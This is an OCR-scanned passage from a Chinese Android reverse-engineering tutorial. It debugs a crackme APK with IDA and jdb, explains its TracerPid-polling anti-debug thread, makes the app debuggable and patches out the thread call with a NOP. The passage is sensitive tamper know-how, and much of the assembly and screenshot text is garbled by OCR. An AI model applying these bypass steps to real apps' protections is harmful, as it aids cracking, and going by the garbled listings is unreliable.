public void onClick (View paramAnonymousView) 


Intent locallntent = new Intent (MainActivity.this, ResultActivity.class); 
MainActivity.this.startActivity(localIntent); 
return; 


} 
Toast.makeText(MainActivity.this.getApplicationContext(), ，" 验 证 码 校 验 失败 "”，0] .show(); 


) 
} 


public native boolean SecurityCheck (String paramString); 
} 


看 到 它 的 判断 ，securityCheck 方 法 是 native 层 的 ， 所 以 这 时 候 去 解压 apk 文 件 ， 获 取 它 的 so 文件 ， 使 用 IDA 打 开 查 看 native 


函数 的 相对 地 址 11A8， 如 图 22-29 所 示 。 


Function name 


сха atexit 

_cxa finalize 

_ android log print 
. aeabi memset 

. stack chk fail 
free 

disym 

malloc 

raise 


-text: В00011А8 
„Сех: В00011А8 ; =============== 5 Ш B R П U T I NE ========================: 
-Lext-B00B11ñ8 
-Lext-B00B11ñ8 
-text -B00D116ñ8 
-text:999911n8 | 

-Lext-B00B11ñ8 
-text-BBBD11ñ8 var 20 = —Bx2ü 
-text-BBBD1188 uar 1Ë = -xiC 
-Lext-B00B11ñ8 


| > 


EXPORT Java com yaotong crackme Hainfictiuity st 
aua com yaotong crackme Hainfictiuity securituCheck 


mE | = " -text-80880811ñ8 STHFD — SP*, £RA4-R7Z,R11,LR? 

. апи Unwind Find &exidx ^ | text- 90011Ac SUB SP, SP, H8 

abort © |.text:BBB11BB HOU R5, RB 

memcpy ^ _text:B0B011BM5 LDR RB, -( GLOBAL OFFSET TABLE - Bx11CE8) 
. cxa begin cleanup © |.text:BBBH11B8 LDR R6, -(unk 6298 - Bx5FBED) 

__сха type match © |. text: BBBDT1BC HOU RA, R2 

sub 1164 © |.text:BBBBT1CB ADD RB, PC, RB ; GLOBAL OFFSET TABLE 
Java com yaotong crackme NMailnActivity_securityCheck ^ | tezt - BBBBT1CA app RB, R6, RB : unk 6298 = = 
sub_130C © |text-BBBBT1C8 LDRB RB, [RB,H(hute 6359 - 80x6298)] 
sub_16A4 © |.text:BBBBT1CE C HP Rü, HA 

sub_17F4 © |.text: BBBB11DB ВНЕ loc 1215 

JNI OnLoad © | text-:BBBBT1DA HOU R1, #2 

sub_1CA8 © |.text:BBBB11D8 HOU Rü, #7 

sub_22AC © .text-BB080811DC STR R1T，[sSP ,站 Bx28+uar 28] 

sub 2378 = |.text: BBBH1EB STR RB, [SP,ttüx28*var 1C] 

sub 239C © |.text:BBBBHTT1EA LDR RB, -( _ GLOBAL ÜFFSET TRBLE - Bx11FA) 
sub 2494 © |.text:BBBBTT1ES LDR R1, -(unk nan6B - Bx5FBC) 

sub 24F4 = |.text: BBBHT1EC ADD RB, PC, RB ; GLOBAL OFFSET TABLE 
sub_254C © -text-BBB80811F08 ñDD R2, R1, RB. — li i 5 
sub 258C © |.text:BBBE dE LDR R1, -(unk 45468 - Bx5FBCY 

—umodsi3 ^ _text-B0B011F8 ADD R7, R6, Rü ; unk_629B 

. aeabi drsub ^ |.text:BB8BBT1FC ADD R3, R1, RB ; unk_4468 

—subdf3 © |.text-BB8BB81288 ADD RB, R7, #0874 

—aeabi dadd ^ |.text : BBB812 8^ чай R1, H8 

—floatunsidf ^ |text-:BüB88012B88 BL sub 2594 

—floatsidf © |.text : HBBE2 BC HOU RB, #1 

—extendsfdf2 ^ |.text:88881218 STRB RB, [RZ ,HW(bute 6359 - 8x6298)] 
—floatundidf .text: 00001215 

. floatdidt .text:BBBB1215 loc 1215 s CODE XREF: Java com i 
—muldf3 © |.text:BB8881215 LDR RB, -( GLOBAL ÜFFSET TABLE - 8x122H) 
. divdf3 © |.text:B8881218 ADD RB, PC, Rü ; GLOBAL ÜFFSET TABLE - 
sub_2E50 © -text-BB0808121C ñDD R8, Вб, RB ; unk 6298 

fusis - ^ |text-B8888122B0 LDRB RB, [RB,tt(byte 635h - 8x6298)] 


922-29 & Z É Җ пун Ж] x AL 


这 里 的 ARM 指 令 代码 不 分 析 了 ， 大 家 目 行 查看 即 可 ， 直 接 进 入 调试 即 可 ， 再 打开 一 个 IDA 进 行 天 联 调试 ， 如 图 22-30 所 示 。 


C Choose process to attach to 


[32] com.yaotong.crackme 


AX com. vao 


Line 1 of 1 


图 22-30 ”附加 进程 


选择 对 应 的 调试 进程 ， 然 后 点 击 OK， 如 图 22-31 所 示 。 


JAEA2000 
JAEAADDO 
JAEA7000 


Z3EAB000 

Z3EAD000 Z3EAED00 

JAEAEO0D0 JAEBODDO 
JAEB /000 


G888858858 


图 22-31 查找 需要 调试 的 so 文件 


使 用 Ctrl+ S 键 找到 对 应 so 文件 的 基地 址 74EA9000， 和 上 面 得 到 的 相对 地 址 相 加 得 到 绝对 地 址 
74EA9000+11A8=74EAA1A8。 使 用 G 键 直接 跳 到 这 个 地 址 ， 如 下 所 示 : 


libcrackme. 50: 74EAA1A8 Jaua com yaotong crackme Hainhctiuitu securityCheck 
ibcrackme.50:7h5ER 188 

libcrackme.so:754ERA188 var 20- -0x20 

libcrackme.so:75EARAR188 var 1C= -8x1C€ 

libcrackme.so:7h5ERR188 


libcrackme .50: 7 ЗЕААТАС SUB SP, SP, #8 

1ibcrackme .s0:74EAA1BO MOU R5, RB 

libcrackme.so:75ERAa1B^ LDR RB, -(unk 7&4EREFBC - 8üx/hERRT1C8) 
libcrackme.so:75ERA1B8 LDR R6, -8x2DA4 
libcrackme.so:7hEARn1BC HOV R4, R2 


下 个 断 点 ， 然 后 点 击 F9 运 行程 序 ， 如 图 22-32 所 示 。 


Fle Edt Jump Search View | Debugger Windows 


Options Help 
FE = => + 8 006 5 x5 [A] @ nË mm а! uv > gf ш Ж 
Library function Data P Regular function | | Unexplored P Instruction 


[f] Functions window І m x 


Function name | 


22-32 


External symbol 


IDA View-A 


© ЕЕЕЕЕЕЕЕ 


运行 程序 


这 时 候 会 友 现 IDA 退 出 调试 页 面 了 ， 表 次 进入 调试 页 面 ， 运 行 ， 还 是 退出 调试 负面 了 。 似 乎 没 法 调试 了 。 


其 实 这 里 是 阿里 做 了 反 调 试 侦查 ,如果 友 现 自己 的 程序 被 调试 ， 丈 直接 退 
幅 ， 只 是 人 简 早 介绍 一 下 原理 。 


出 程序 。 那 么 怎么 知道 有 人 调试 呢 ? 这 里 限于 篇 


前 面 说 到 ，1DA 是 使 用 android server 在 root 环 境 下 注入 到 被 调试 的 进程 中 ， 那 么 这 里 用 到 一 个 技术 就 是 Linux 中 的 
ptrace， 关 于 ptrace 这 里 也 不 解释 了 ， 大 家 可 以 自行 的 去 搜 一 下 ptrace 的 相关 知识 。 那 和 又 Android 中 如 果 一 个 进程 被 另外 一 个 进 
程 ptrace 了 之 后 ， 在 其 status 文 件 中 有 一 个 字段 TracerPid 可 以 标识 是 被 哪个 进程 trace 了 ， 可 以 使 用 命令 查看 到 被 调试 的 进行 信 


shell@pisces:/ Š ps 


Estatus Fr: /proc/[pid]/status， 如 下 所 示 : 


C:\Users\jiangweil-g>adb shell 


shell@pisces:/ $ ps 


u0_a90 


|grep com.yao 
29376 9466 


shell@pisces:/ 5 cat /proc/29376/status 


Name : yaotong.crackme 

State: t (tracing stop) 

Tgid: 29376 

Pid: 29376 

PPid: 9466 
[TracerPid: — 27445]«—— 被 进程 id-27445 的 进程 调试 
Uid: 10090 10090 10090 10090 
Gid: 10090 10090 10090 10090 
FDS1ze: 256 

Groups: 50090 

UmPeak: 867852 kB 

UmSize: 867852 kB 

UmLck: И КВ 

UmPin: H kB 

UmHWM: 38356 kB 

UmRSS : 38356 ЕВ 

UmData: 11832 kB 

UmStk: 136 kB 

UmExe: 8 kB 

UmLib: 44212 kB 

UmPTE: 116 kB 

UmSwap: 0 kB 

Threads: 9 


root 


这 里 的 进程 被 27445 进 程 trace 了 ， 在 用 ps 命令 看 看 27445 是 哪个 进程 : 


|grep 27445 


27445 27418 10060 8316 ffffffff 00000000 S 


shell@pisces:/ $ 


867852 38356 ffffffff 00000000 t com.yaotong.crackme 


./android server 


果不其然 是 android server 进程。 知道 原理 了 ， 也 大 致 猜 到 了 阿里 在 底层 做 了 一 个 循环 检测 这 个 字段 如 果 不 为 0， 那 么 代表 
自己 进程 有 人 trace， 那 么 就 直接 停止 退出 程序 ， 这 个 反 调 试 技 术 用 在 很 多 安全 防护 的 地 方 。 


那么 下 面 就 来 看 看 如 何 应 对 这 个 反 调试 ?刚刚 看 到 ， 只 要 一 运行 程序 ， 就 退出 了 调试 界面 ， 说 明 ， 这 个 循环 检测 程序 执行 的 
时 机 非常 早 ， 那 么 现在 知道 的 最 早 的 两 个 时 机 是 : 一 个 是 .init_array， 一 个 是 JNI OnLoad。 


.init_array 是 一 个 so 最 先 加 载 的 一 个 段 信息 ， 时 机 最 早 ， 现 在 一 般 so 解 密 操作 都 是 在 这 里 做 的 。JNI_OnLoad 是 so 被 
System.loadLibrary 凋 用 的 时 候 执行 ， 它 的 时 机 要 早 于 哪些 native 方 法 执行 ， 但 是 没有 .init_array 时 机 早 。 知 道 了 这 两 个 时 机 ， 
下 面 先 来 看 看 是 不 是 在 JNI_OnLoad 遂 数 中 做 的 策略 ， 所 以 需要 先 动 态 调 试 INI_ OnLoad 函数 。 


既然 知道 了 JNI_OnLoad 函 数 的 时 机 ， 如 果 把 检测 遂 数 放 在 这 里 的 话 ， 不 能 用 之 前 的 方式 去 调试 了 ， 因 为 之 前 的 那 种 方式 时 
机 太 晚 了 ， 只 要 运行 融 已 经 执行 了 JNL_OnLoad 函 数 ， 所 以 焉 会 退出 调试 页 面 ， 笠 好 这 里 IDA 提 供 了 在 so 文件 load 的 时 机 ， 只 需 
要 在 Debug Option 中 设置 一 下 就 可 以 了 ， 在 调试 页 面 的 Debugger 选 择 Debugger Option 选 项 ， 如 图 22-33 所 示 。 


然后 勾 选 Suspend on library load/unload 即 可 ， 如 图 22-34 所 示 。 


Debugger | Options Windows Help 


iq Quick debug view Ctrl -2 


I Debugger windows " 
g Breakpoints ' 
" Watches ` 
Е Tracina М 


Continue process FQ 


Attach to process... 
Process options... 


Pause process 


D EJ 


Terminate process Ctrl - F2 


Detach from process 


Refresh memory 


Take memory snapshot 


Step Into F7 
Step over FS 
Run until return Ctrl - F7 
Run to cursor F4 


Switch to source 


Use source-level debugging 


Open source file... 


Debugger options... 


图 22-33 ”设置 Debugget 选 项 


' - 
ы 


i 


B, 


‚ Debugger setup 
Events Logging 
[gl Suspend on debugging start 加 Segment modifications 
[ГЇ Evaluate event condition on exit Thread start/exit 
Suspend on process entry point Library load/unload 
Suspend on thread start/exit 加 Breakpoint 
Suspend on library load/unload llebuzzing message 
[gl] Suspend on debugging message 
т 


Event condition 


Орі1 ол= 

[Е Feconstruct the stack 

[gl Show debugger breakpoint instructions 
E] Use hardware temporary breakpoints 

| | Autoload FIE files 


[Г oet as Just-ir-time debugger 


22-34 2) Suspend оп library load/unload 


这 样 设 置 之 后 ， 还 是 不 行 ， 因 为 程序 已 经 开始 运行 ， 就 在 static 代 码 块 中 加 载 so 文件 了 ， 如 图 22-35 所 示 。static 的 时 机 非常 
所 以 这 时 候 ， 需 要 让 程序 停 在 加 载 so 文 件 之 前 即 可 。 


MainActivity.class >x 


package com.vaotong.crackme; 
Imlimport android.app.Activitv; 


public class Main&áctivity extends Activity 
| 

public Button btn submit; 

public EditlIext inputCode; 


static 
| 


Svstem.loadLibrary("crackme"); 


图 22-35 ”static 代 码 块 中 加 载 so 文 件 


那么 想到 的 就 是 添加 代码 waitForDebugger， 这 个 方法 就 是 等 待 debug， 还 记得 在 之 前 的 调试 smali 代 码 的 时 候 ， 就 是 用 这 
种 方式 让 程序 停 企 了 启动 切 ， 然 后 等 待 去 用 jdb 进 行 attach 操 作 。 


这 一 次 可 以 在 System.loadLibrary 方 法 之 前 加 入 waitForDebugger 代 码 即 可 ， 但 是 这 里 不 这 么 干 了 。 还 有 一 种 更 简单 的 方 
式 束 是 用 am 命 令 ，am 命 令 本 身 可 以 局 动 一 个 程序 ， 当 然 可 以 用 debug 方 式 局 动 : 


аар shell am start -D 


-п com.yaotong.crackme/. 
MainActivity 


这 里 一 个 重要 参数 融 是 -D， 用 debug 方 陈 司 动 : 


C:NUsersNjlangweil-g>adb shell am start -D -n com.yaotong.crackme/.MainActivity 
Starting: Intent { cmp-com.yaotong.crackme/.MainActivityvy ) 


运行 完 之 后 ， 设 备 是 出 于 一 个 等 待 Debugger 的 状态 ， 如 图 22-36 所 示 。 


мапа For Debugger 


图 22-36 ”程序 处 于 等 待 调试 状态 


这 时 候 ， 再 次 使 用 IDA 进 行进 程 的 附加 ， 然 后 进入 调试 页 面 ， 同 时 设置 一 人 Debugger Option 选 项 ， 然 后 定位 到 
JNIL_OnLoad 函 数 的 绝对 地 址 ， 如 图 22-37 所 示 。 


但 是 发 现 ， 这 里 没有 RX 权限 的 so 文件 ， 说 明 so 文 件 没有 加 载 到 内 存 中 ， 想 一 想 还 是 对 的 ， 因 为 现在 的 程序 是 wait 
Debugger， 也 就 是 还 没有 走 System.loadLibrary 方 法 ，so 文 件 当然 没有 加 载 到 内 存 中 ， 所 以 需要 让 程序 跑 起 来 ， 这 时 候 可 以 使 
用 jdb 命 令 去 attach 等 待 的 程序 ， 命 令 如 下 : 


jdb -connect com.sun.Jdi.SocketAttach:hostname=127.0.0.1,port=8700 


Name Start End ] Ali е Туре 
45! com.yaotong.crackme l.apk J4EAO000 7AEA2000 | i ， | public 


Е com.yaotonq.crackme_1l.apk TAE ТАЕААООО ERA ) . yyt AJ public 


Line 2 of 2 


图 22-37 ”定位 到 JNI_OnLoad 绝 对 地 址 


其 实 这 条 命令 的 功能 类 似 于 前 一 草 中 说 到 用 Eclipse 调 试 smali 源 码 的 时 候 ， 在 Eclipse 中 设置 远程 调试 工程 ， 选 择 Attach 方 
式 ， 调 试 机 的 ip 地 址 和 端口 ， 还 记得 8700 并 口 是 默 认 的 端口 ， 但 是 运行 这 个 命令 之 后 ， 出 现 了 一 个 错误 : 


C:\Users\jiangweil-g>jdb -connect com.sun.jdi.SocketAttach:hostname-127.0.0.1,po 


rt-8700 
java.net.SocketException: Software caused connection abort: recv failed 

at java.net.SocketInputStream.socketRead0 (Native Method) 

at java.net.SocketInputStream.read(SocketlInputStream.java:152) 

at java.net.SocketInputStream.read(SocketlInputStream.java:122) 

at com.sun.tools.jdi.SocketTransportService.handshake(SocketTransportServic 
e.java:130) 

at com.sun.tools.jdi.SocketTransportService.attach(SocketTransportService. 
java:2232) 

at com.sun.tools.jdi.GenericAttachingConnector.attach(GenericAttachingConnec 
tor.java:116) 

at com.sun.tools.jdi.SocketAttachingConnector. 
attach(SocketAttachingConnector.;Jjava:90) 

at com.sun.tools.example.debug.tty.VMConnection.attachTarget (VMConnection. 
java:519) 

at com.sun.tools.example.debug.tty.VMConnection.open(VMConnection.java:32328) 

at com.sun.tools.example.debug.tty.Env.init(Env.java:603) 

at com.sun.tools.example.debug.tty.TTY.main(TTY.java:10660) 


致命 错 i ik: 
无 法 附加 到 目标 vM. 


无 法 连接 到 目标 的 VM ， 那 么 这 种 问题 大 部 分 都 出 现在 被 调试 程序 不 可 调试 。 可 以 查看 apk 的 android: debuggable 属 性 : 


N: android=http: Чеш android. com/apk/res/android 

E: - DX y id: == 
Т аган тега! а то (0xO101021b)- (type 010701 这 里 3 有 android:debuggable 

А: android:versionName(0x0101021c)=”. o” (Raw: ”1.0”) "true" 属性 ， 所 以 不 能 调试 ， 我 


4 们 需要 添加 这 个 属性 ， 然 后 回 
А: android:minSdkVersion(0x0101020c)-(type 0х10) 0х8 
А: android:targetSdkVersion(0x01010270)-(type 0х10)0х13 编译 
E: application (line-11) 
А: апдгоі4:1аБе1 (0х01010001)=@0х7#070000 
А: android:icon(0x01010002)-8$0x7f020001 
А: android:allowBackup (0х01010280)= (type Ox12)0xffffffff 
Е: асїіуіїу (11пе=15) 
А: android:label (0х01010001)=@0х7#070000 
А: android:name (0x01010003)-2" com. yaotong. crackme. fain&ctivity (Raw: “сот. yaotong. crackme. Маі пАсііуіїу”) 
E: intent-filter (line-18) 
E: action (line-19) 
А: android:name(0x01010003)-" android. intent. action. MAIN" (Raw: "android. intent. action. MAIN") 
E: category (line-21) 
А: android:name(0x01010003)-" android. intent. category. LAUNCHER” (Raw: "android. intent. category. LAUNCHER”) 
E: activity (line-24) 
А: android:name (0x01010003)-" com. yaotong. crackme. ResultActivity" (Raw: "com. yaotong. crackme. ResultActivity") 


А: package-"com. yaotong. crackme" (Raw: "com. yaotong. сгаскпе”) 


果不其然 ， 这 里 没有 debug 属 性 ， 所 以 这 个 apk 是 不 可 以 调试 的 。 需 要 添加 这 个 属性 ， 然 后 再 回 编译 即 可 : 


<?xml version-"1.0" encoding-"utf-8"?» 


«manifest android:versionCode-"1" android:versionName-"1.0"| android:debuggable-"true" |package-" com. yaotong.crackme" 


xmlns:android-"http: //schemas. android.com/apk/res/android 
«application android:label-"Qstring/app name" android:icon-"gdrawable/creakme2 logo" android:allowBackup-"true"» 
«activity android:label-"Qstring/app name" android:name-"com.yaotong.crackme.MainActivity"» 
«intent-filter» 
«action android:name-"android.intent.action.MAIN" /» 
«category android:name-"android.intent.category.LAUNCHER" /» 
«/intent-filter» 
«/activity» 
«activity android:name-"com.yaotong.crackme.ResultActivity" /» 
«/application» 
«/manifest» 


回 编译 : 


java -jar apktool.jar b -d out -o debug.apk 


签名 apk: 


java -jar .\sign\signapk.jar .\sign\testkey.x509.pem .\sign\testkey.pk8 debug. 
apk debug.sig.apk 


然后 再 次 安 疼 ， 使 用 am 命令 局 动 。 


1) 运行 命令 : 


аар shell am start -D -n com.yaotong.crackme/.MainActivity 


出 现 Debugger 的 等 待 状态 。 


2) 启动 IDA 进 行 目标 进程 的 Attach 操 作 。 


3) 运行 命令 : 
Јар -connect com.sun.Jdi.SocketAttach:hostname=127.0.0.1,port=8700 
C:NUsersNjlangweil-g>jJjdb -connect com.sun.jdi.SocketAttach:hostname-127.0.0.1,po 
rtz8700 


4) 设置 Debugger Option 选 项 。 


5) 点击 1DA 运 行 按钮 ， 或 者 F9 快 捷 键 ， 运 行 。 


C:\Users\jiangweil-g>jdb -connect com.sun.jdi.SocketAttach:hostname-127.0.0.1,po 
ru=8700 

设置 未 捕获 的 java.lang.Throwable 

设置 延 迷 的 未 捕获 的 java.lang.Throwable 

正在 初始 化 jab... 


> 


看 到 了 ， 这 次 jdb 成 功 的 attach 住 了 ，debug 消 失 ， 正 单 运 行 了 ， 但 是 同时 弹出 了 一 个 选择 提示 ， 如 图 22-38 所 示 。 


IDA could not find the file "/data/app-lib/com. yaotong. erachme-1/liberackme. so”. 
If that file can be accessed, please specify its directory: 


Source | # data/app-lib/com.yaotong. crackme-l 再 | — 


Ilestination hl 


__ ж} esa M 


图 22-38 ”so 文件 选择 框 


这 时 候 不 用 管 已， 全 部 选择 Cancel 按 钮 ， 然 后 丈 运 行 到 了 linker 模 块 了 ， 如 下 所 示 : 


linker : 480686C7 002 


linker:^488C78D3 DCB 8x! 
linker:^88C78D^4 DCB 4 


linker:400C7005 DCB 8xF5 ; 
© |linker:400C70D0ő DCB 0x82 ; 
~ dinker:^88C78D7 DCB 8x72 ; r 
© |linker:400C7008 DCB 8xC^ ; 
”|Linker :4699C76D9 DCB OxF8 ; 
_ 


linker:^88C78DR DCB 8 


© dinker:^88C78DB DCB 68х51 
= üinker:^488C78DC DCB GxD4 


说 明 so 已 经 加 载 进来 了 ， 再 去 获取 JNI OnLoad 函数 的 绝对 地 址 ， 如 图 22-39 所 示 。 


JAFA 7000 
JAFASBODU 
75155000 
75158000 


7515F000 


75160000 
75161000 


o sisi g S S o 


Line 5 of 7 


图 22-39 ”获取 JNIL_ OpLoad 函 数 的 绝对 地 址 


用 Ctrl+S 查 找到 了 基地 址 7515A000， 用 静态 方式 1DA 打 开 so 查 看 相对 地 址 1B9C， 如 下 所 示 : 


.text:88881B9C HNI OnLoad 

|-text:88881B9C 

.text:88881B9C handle = -0x20 

|, text: 8BBB1B9C 

.text:88881B9C STHFD — SP*, 4Rh-R9,R11,LR) 
绝对 地 址 加 上 相对 地 址 为 7515A000+ 1B9C=7515BB9C， 然 后 点 击 G 键 跳 转 ， 如 图 22-40 所 示 。 


т Ue 
Ee 


Rà. Jump to address 


Tump address T515559C]| 


922-40 “” 跳 转 到 运行 的 内 存 地 址 


跳 转 到 指定 的 函数 位 置 ， 如 下 所 示 : 


E. QR. АР Чї CE r HE kO ETRE A ш ILU ш ш — ш —F EJ EP am "um 


libcrackme.so:7515BB9C JNI Оп! оай 

libcrackme.so:7515BB9C | 
libcrackme.so:7515BB9C var_20= -0x20 
libcrackme.so:7515BB9C 


m 
libcrackme .so:7515BBAQ арр R11, SP, #0х18 
libcrackme.s0:7515BBAR^ SUB SP, SP, #8 
libcrackme.s0:7515BBA8 MOU R4, R8 
libcrackme.s0:7515BBARC LDR R8, -(unk 7515FFBC - 0x7515BBC8) 
libcrackme.s0:7515BBB8 LDR R9, -8x2D4^ 
libcrackme.s0:7515BBB^ MOU R8, #9 
libcrackme.so:7515BBB8 ñDD RB, PC, RB ; unk 7515FFBC 
libcrackme.so:7515BBBC арр R8, R9, RB 
libcrackme.so:7515BBC8 STR R8, [R8,H(dvord 751682C8 - 0x75168298)] 
libcrackme.s0:7515BBC^ LDR R5, [R8,Ht(dvord 751682C^h - 0x/5168298)] 
libcrackme.so:7515BBC8 CHP R5, #0 
libcrackme.so:7515BBCC BEQ loc 7515BC28 
libcrackme.s0:7515BBD8 
libcrackme.s0:7515BBD8 loc 7515BBD8 ; CODE XREF: ИНГ. 
libcrackme.so:7515BBD8 LDR R8, [R5] 
libcrackme.s50:7515BBD^ СМР RB, #1 
libcrackme.s0:7515BBD8 BLT loc 7515BBFE 
libcrackme.s0:7515BBDC ADD R7, R5, W 
libcrackme.s0:7515BBE8 MOU Ró, #0 


UE ONU д a ak rkr E 


这 时 候 再 次 点 击 运行 ， 进 入 了 JNI_OnLoad 处 的 断 点 ， 如 下 所 示 : 


LLULL ас ис. UP 二 


libcrackme.so:7515BBñ0 арр R11, SP, 10x18 
libcrackme.s0:7515BBhü^ SUB SP, SP, #8 
libcrackme.so:7515BBA8 MOU R4, R8 
libcrackme.so:7515BBRC LDR R8, -(unk 7515FFBC - 
ШӘ  libcrackme.so:7515BBB8 LDR R9, =0x2D4 | 
libcrackme.s0:7515BBB^ MOU R8, #0 
libcrackme.so:7515BBB8 арр R8, PC, R8 ; unk 751! 
libcrackme.so0:7515BBBC арр R8, R9, RO 
libcrackme.so:7515BBC8 STR R8, [R8,H4(dvord 7516 
libcrackme.s0:7515BBC^ LDR R5, [R8,H(duord 7516 
libcrackme.s0:7515BBC8 CHP R5, HD 
libcrackme.so:7515BBCC BEQ loc 7515BC28 


libcrackme.s0:7515BBD8 
libcrackme.s0:7515BBD8 loc 7515BBD8 


下 面 就 开始 单 步 调试 了 ， 但 是 每 次 到 达 BLX R7 这 条 指令 执行 完 之 后 ，JNI_OnLoad 就 退出 了 ， 如 下 所 示 : 


libc.so:4010C8ő64 ; ------------- 


libc.sn:4818686^ MOUS 
-二 dibr.so:hH1BC868 BEQ 
| libc.so:^4818C686C MOU 
| libc.so:48186C87B8 CHH 
: libc.sn:48186C87*54 BXLS 
| libc.so:4818C878 RSB 

— ^ Hibc.so:^H18C87C B 


libc.so:4010C886 ; 一 -一 一 一 一 一 一 一 一 一 一 一 


| 
|^ ПЇ1һс.<0:Н4Й0Й10С88Й 
^ ibc.so:^818C888 loc ^818C888 
^^ dibc.so:4818C888 LDHFD 
libc.so:48180C8854 HOU 
— “ üibc.so:4818C888 В 


libc.50:581800888 = 一 一 一 一 一 一 一 一 一 一 一 一 一 


libc.so:4010C88C — bionic clone 


HH, RB 

loc ^4H1B8688H 
Hé, R12 

HH, HBx189BD 
LR 

RB, Rü, #0 
sub HB128D7M 


SP*, (RB,R15 
R2, SP 
_ thread entry 


DCE OXD 


经 过 好 几 次 尝试 都 是 一 样 的 结果 ， 友 现 这 个 地 方 有 问题 ， 可 能 束 是 有 反 调 试 的 地 方 了 ， 表 次 进入 调试 ， 看 见 BLX 跳 转 的 地 方 R7 


寄存 器 中 是 pthread_create 国 数 ， 这 个 是 Linux 中 新 建 一 个 线程 的 万 法 。 


阿里 的 肥 调 试 束 在 这 里 开局 一 个 线程 进行 轮 询 操 作 ， 如 图 22-41 所 示 ， 去 读 取 /proc/[pid]/status 文 件 中 的 TrackerPid 字 段 
值 ， 如 果 发 现 不 为 0， 就 表示 有 人 人 在 调试 本 应 用 ， 在 JNI_OnLoad 中 直接 退出 。 关 于 反 调 试 代码 在 前 面 已 经 详细 介绍 了 。 


d 
І * l 


libcrackme.so:7545BC58 BLX R7 


libcrackme.s0:7515BC5C BL unk Z515B7F%W 
libcrackme.so:7515BC68 LDR RB, R7-libc.so:pthread create 
libcrackme.so:7515BCó^ MOU Вб, pthread create DCB 8xF8 ; 


libcrackme.so:7515BC68 MOU R1, DCB 
libcrackme.so:7515BC6C ORR R6, DCB 

DCB 
UNKNOWN 7515BC58: JNI OnLoad*BC (Synchronized wit.DCB 


| DCB 
Hex View-1 
ex View DCB 


FFFFBFF0 (E ве 88 88 88 ве во OB өе 88 88 88 Eprp 


BxhF ; 0 
0x2D ; - 
BxE9 ; 
xt 
üxDO ; 
DxHD ; 
ÜxE2 ; 
AXFO ; 


这 里 看 到 T WH Y pthread create 来 新 建 一 ый ый» 


个 线程 ， 这 里 猜测 可 能 做 检测 轮训 操作 的 
地 方 


9122-41 反 调 试 代码 


问题 找 天 了 ， 现 在 怎么 操作 呢 ? 只 要 把 BLX R7 这 段 指令 干 挥 即 可 ， 如 果 是 smali 代 码 的 话 ， 可 以 直接 删除 这 行 代码 即 可 。 但 
是 so 文件 不 一 样 ， 它 是 汇编 指令 ， 如 果 直 接 删 除 这 条 指令 的 话 ， 文 件 会 友 生 错 乱 ， 因 为 本 身 so 文 件 天 有 固定 的 格式 ， 比 如 很 多 
段 的 内 容 ， 每 个 段 的 偏 移 值 也 是 保存 的 ， 如 果 这 样 去 删除 会 影响 这 些 偏 移 值 ， 会 破坏 so 文件 格式 ， 导 致 so 加 载 出 错 的 ， 所 以 这 
里 不 能 手动 去 删除 这 条 指令 。 还 有 另外 一 种 方法 ， 就 是 把 这 条 指令 变 成 空 指令 ， 在 汇编 语言 中 ，nop 指 令 束 是 一 个 空 指令 ,， 它 什 


么 都 不 干 ， 所 以 这 里 直接 改 一 下 指令 即 可 ，arm 中 对 应 的 nop 指 令 是 : 00 00 00 00; 那么 看 到 BLX R7 对 应 的 指令 位 置 为 : 


1C58， 如 下 所 示 : 


-text -GBBDTUS5C 
-Lext: 608001G68 
.Text :dio 
-Text -GBBDTU68 
„сех: В0001СёС 


查看 它 的 Hex 内 容 是 37 FF 2F E1， 如 下 所 示 : 


IDA View-A 


88 18 ЯВ ЕЗ 


BLY R7? ; inp dlsum 
BL sub 1/FA 

LDR [R4] 

HUU R6, #4 

HOU R1, RS 

ORR Rá. Ró. HBx1BBBB 


89 


Structures 


7915BC28 68 58 4D E2 85 DO AG 
/515BC38 $388 38 ЯВ ЕЗ 880 88 85 
/515BC48 88 88 89 ЕВ 00 18 АЙ 
/515B6C58 FEMA Eh FE FF 
7/515BC68 85 18 ЯВ E1 81 68 86 


可 以 使 用 一 些 二 进 制 文件 软件 进行 内 容 的 修改 ， 这 里 使 用 010Editor 工 具 进行 修改 ， 


1C10h: ЕЕ FF FF 1A 80 00 9F ES 
1C20h: 00 00 89 EO 34 10 80 ES 
1C30h: 68 00 SF ES 68 10 9F ES 
1C40h: 00 00 8F EO 00 20 81 EC 
1C50h: 24 70 90 ES 20 00 4B Е: 


68 88 9F E5 68 18 9F E5 
00 008 SF ED 88 28 81 ЕВ 
24 70 98 E5 28 88 4B E2 
88 886 94 E5 8^ 68 ЯВ ЕЗ 
86 20 R8 E1 18 38 98 E5 


00 10 AO ЕЗ 00 00 ВЕ EO 
08 50 4D E2 05 DO AO E1 
00 30 AO ЕЗ 00 80 85 ES 


37 


„00 10 AO ЕЗ 
га FE FF EB 


FF 2F El 


1C60h: 00 00 94 ES 04 60 AO ЕЗ 05 10 AO El 01 68 86 ЕЗ 
1C70h:| 06 20 AO E1 18 30 90 ES 04 00 AO Е1 33 FF 2F El 


直接 修改 成 00 00 00 00， 如 下 所 示 : 


1C40h:| 00 00 БЕ ED 00 20 81 ED 00 


如 下 所 示 : 


iyy.€.Yà.. а. 
..5à4.€à.PMá. 
h.Yáh.Yá.O &.€. 
Е cc 
sp. A ‚кату/ааруё 
." а.. à.htà 


СТ" азӯу/а 


m 出 
N-N р. DD 


00 89 EQ 00 10 Ай ЕЗ 


1C50h: 24 70 S80 ES 20 O0 4B Ел BREED E4 ЕЕ FF ЕБ 


Tranh. ПП ПП 984 КЫ 04 БП АП ЕЯ ПМ 


保存 修改 之 后 的 so 文件 ， 再 次 使 用 IDA 进 行 打开 查看 ， 如 下 所 示 : 


m LLC Pk ú. a E EEFE HE RF F EF 


.Lext: BHBBTESA 
- сех: BBBHTE 5S 
.Lext: BBHBBTESE 


owvt "ПН r ñ 


中 令 被 修改 成 了 ANDEQ RO, RO, RO, 


修改 了 之 后 ， 蔡 换 原来 的 so 文件 ， 再 次 重新 回 编译 ， 


-UB RH, 
AHDEQ RH, 
BL sub 
I np ой 


1n АП ЕІ 01 6A ЯБ F3 


шелш шиш а > 
R11, #-yar 20 
RB, RB 

17F4 


rnhi 


签名 安装 。 再 次 按照 之 前 的 逻辑 给 主要 的 加 密 函 数 下 断 点 ， 这 里 不 需 
要 在 给 JNIL_OnLoad 函 数 下 断 点 了 ， 因 为 已 经 修改 了 反 调 试 功 能 了 ， 所 以 这 里 只 需要 按照 如 下 简单 几 步 操作 即 可 : 


1) 局 动 程序 。 


2) 使 用 IDA 进 行进 程 的 attach。 


